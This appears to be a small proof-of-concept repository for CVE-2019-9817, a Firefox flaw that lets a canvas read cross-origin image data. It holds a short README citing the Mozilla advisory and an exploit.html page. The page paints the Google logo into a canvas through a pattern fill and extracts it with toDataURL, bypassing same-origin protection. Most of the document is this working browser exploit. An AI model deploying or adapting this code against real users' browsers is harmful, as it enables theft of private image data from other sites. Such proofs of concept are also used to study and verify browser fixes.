├── CVE-2019-9817
    ├── README.md
    └── exploit.html
└── README.md


/CVE-2019-9817/README.md:
--------------------------------------------------------------------------------
1 | ## CVE-2019-9817: Stealing of cross-domain images using canvas
2 | https://www.mozilla.org/en-US/security/advisories/mfsa2019-13/#CVE-2019-9817
3 | 
4 | 
5 | Images from a different domain can be read using a canvas object in some circumstances. This could be used to steal image data from a different site in violation of same-origin policy.
6 | 
7 | 


--------------------------------------------------------------------------------
/CVE-2019-9817/exploit.html:
--------------------------------------------------------------------------------
 1 | 
 2 | <style>
 3 | canvas{border:solid red;}
 4 | </style>
 5 | <pre>
 6 | <h2>CVE-2019-9817</h2>
 7 | <canvas id=canvas width=600 height=300></canvas>
 8 | <img id=hihi />
 9 | <hr>
10 | Leak here
11 | 
12 | <br />
13 | <textarea id=txt rows=20 cols=60 ></textarea>
14 | <script>
15 | // https://www.mozilla.org/en-US/security/advisories/mfsa2019-13/#CVE-2019-9817
16 | 
17 | var ctx = canvas.getContext("2d");
18 | 
19 | var img = new Image();
20 | img.onload = ()=>{
21 |     var pattern = ctx.createPattern(img,'repeat');
22 |     ctx.font = "10000px Arial";
23 |     ctx.fillStyle = pattern;
24 |     ctx.fillText(".", 0, 200);
25 |     hihi.src = txt.value = canvas.toDataURL();
26 | }
27 | 
28 | img.src = 'https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png';
29 | // Google logo shouldn't be stolen by other origin.
30 | 
31 | </script>
32 | </pre>
33 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # PoC
2 | 


--------------------------------------------------------------------------------